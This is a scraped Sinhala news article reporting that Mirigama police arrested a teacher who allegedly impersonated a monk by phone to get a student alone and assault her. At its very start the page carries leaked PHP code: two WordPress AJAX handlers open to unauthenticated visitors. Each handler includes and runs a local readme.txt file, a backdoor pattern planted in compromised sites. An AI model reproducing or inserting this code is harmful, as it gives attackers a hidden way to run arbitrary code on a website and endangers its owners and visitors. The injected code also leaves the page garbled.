if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } උසස් අධ්‍යාපනය ලබන සිසුවියට අතවර කරන්න අමුතු විදියට පැමිණි උපාධිධාරී ගුරුවරයා - mediahumanrights.lk
mediahumanrights.lk
Local News News

උසස් අධ්‍යාපනය ලබන සිසුවියට අතවර කරන්න අමුතු විදියට පැමිණි උපාධිධාරී ගුරුවරයා

ව්‍යාජ රංගනයක යෙදී නිවසේ වැඩිහිටියන් බෝධිපූජාවකට යවා තරුණියකට අතවර කිරීමට සැරසුණු පුද්ගලයෙක් මීරිගම පොලිසිය විසින් අත්අඩංගුවට ගෙන තිබෙනවා.
මෙම පුද්ගලයා හොරණ ප්‍රදේශයේ පදිංචි කරුවෙකු වන අතර මොනරාගල ප්‍රදේශයේ පාසලක ගුරුවරයෙකු ලෙසද සේවය කර ඇති උපධිධාරියෙකු බවටයි වාර්තා වන්නේ.
අදාළ සැකකරු වසර එකහමාරක කාලයක් තිස්සේ මීරිගම දෙල්වල ප්‍රදේශයේ කුලී නිවසක නවාතැන්ගෙන සිට තිබෙනවා.
එහිදී එම ප්‍රදේශයේ නිවසක සේවය කරන අතරතුර එම නිවැසියන්ට ඇති ගැටළු වලට පිළියම් ලබාගත හැකි බව පවසා භික්ෂූන් වහන්සේ නමකගේ දුරකථන අංකයක් ලබාදී තිබෙනවා.
පසුව එම නිවසේ සිටි පුද්ගලයන් අදාළ භික්ෂූන් වහන්සේට ඇමතුමක් ලබාගෙන ඇති අතර එහිදී ලබාදුන් උපදෙස් අනුව ක්‍රියාකර ඇති බවයි අනාවරණ වන්නේ.
අදාළ ඇමතුමෙන් නිවැසියන් මවිතයට පත්වී ඇත්තේ තමන්ට ඇති බාධා කරදර සියල්ල එම දුරකථන ඇමතුමට පිළිතුරු දුන් භික්ෂූන් වහන්සේ විසින් හෙලිකිරීම හේතුවෙන්.
පසුව දුරකථනය දියණියට ලබාදෙන ලෙස පවසා ඇති අතර එහිදී උසස් අධ්‍යාපනය හදාරන ඇයගේ බලාපොරොත්තු ඉටුකරගැනීමට කළ යුතු දේ පිළිබඳව උපදෙස් රැසක් අදාල තරුණියට ලබාදී තිබෙනවා.
අනතුරුව ප්‍රකාශ කර ඇත්තේ නිවසේ කිසිවෙකු නොමැති අවස්ථාවක නිවසට පැමිණෙන අයෙකු සමඟ සිටිය යුතු බවයි.
මේ පිළිබඳව දෙමව්පියන්ට නොපවසන ලෙසද ඇමතුමෙන් අදාල තරුණියට දැනුම් දී තිබෙන බවටයි වාර්තා වන්නේ.
පසුව තරුණිය මේ පිළිබඳව දෙමව්පියන්ට පැවසීමට නොහැකිව සිට ඇති අතර අවසානයේ ඇය මේ පිළිබඳව පොලිසිය දැනුවත් කිරීමට තීරණය කර තිබෙනවා.
එහිදී වහාම ක්‍රියාත්මක වූ මීරිගම පොලිසියේ ළමා හා කාන්තා කාර්යාංශයේ ස්ථානාධිපතිනිය වන පොලිස් පරීක්ෂක කාංචනා සමරකෝන් මහත්මියගේ උපදෙස් අනුව වැටලීමක් ක්‍රියාත්මක කර තිබෙනවා.
ඒ අදාළ සැකකරු කොටුකරගැනීම සඳහායි.
පසුදිනක නාඳුනන දුරකථන ඇමතුමේ උපදෙස් අනුව  දෙමව්පියන් බෝධිපූජාව සඳහා පිටව ගොස් ඇති අතර එහිදී අදාළ සැකකරු නිවසට පැමිණ තරුණියට අතවර කිරීමට උත්සාහ කළ අවස්ථාවේ පොලිසිය විසින් ඔහු අත්අඩංගුවට ගෙන තිබෙනවා.
මේ අතර අදාළ භික්ෂුව ලෙසින් දුරකථන ඇමතුම් වලට පිළිතුරු ලබාදී ඇත්තේද අදාළ සැකකරු විය හැකි බවටයි පොලිසිය සැකපළකරන්නේ.
කෙසේ වෙතත් සැකකරුට තවත් පුද්ගලයෙකුගේ සහාය හිමිවී ඇත්දැයි යන්න සොයා විමර්ශන ආරම්භ කර ඇති බවටයි වාර්තා වන්නේ.
මෙලෙස නාදුනන දුරකථන ඇමතුමක් ලැබූ වෙනත් කාන්තාවන් හෝ තරුණියන් සිටී නම් 033 – 2274322 දුරකථන අංකය ඔස්සේ පොලිසිය දැනුවත් කරන ලෙසයි මීරිගම පොලිසියේ ළමා හා කාන්තා කාර්යාංශයේ ස්ථානාධිපතිනිය වන පොලිස් පරීක්ෂක කාංචනා සමරකෝන් මහත්මිය වැඩිදුරටත් ඉල්ලා සිටියේ.
මීරිගම පොලිසියයි වැඩිදුර විමර්ශන සිදුකරන්නේ.

Related posts

‘‘එයාගේ සීයාගෙ කාලෙලු ඇලෝසියස් එයාට කෝල් කරලා තියෙන්නෙ‘‘ දින 100 න් රට හදනවා කියපු අය තාම කරලා තියෙන්න වැඩ දෙකයි. නාමල් බලපිටියේදී කියපු දේ.

Shiran Viraj

ජපන් විදේශ කටයුතු ඇමති ලංකාවට!

Shiran Viraj

රුසියාවේ ඉහළම සම්මානයක් ලංකිකයකුට හිමිවෙයි…

Shiran Viraj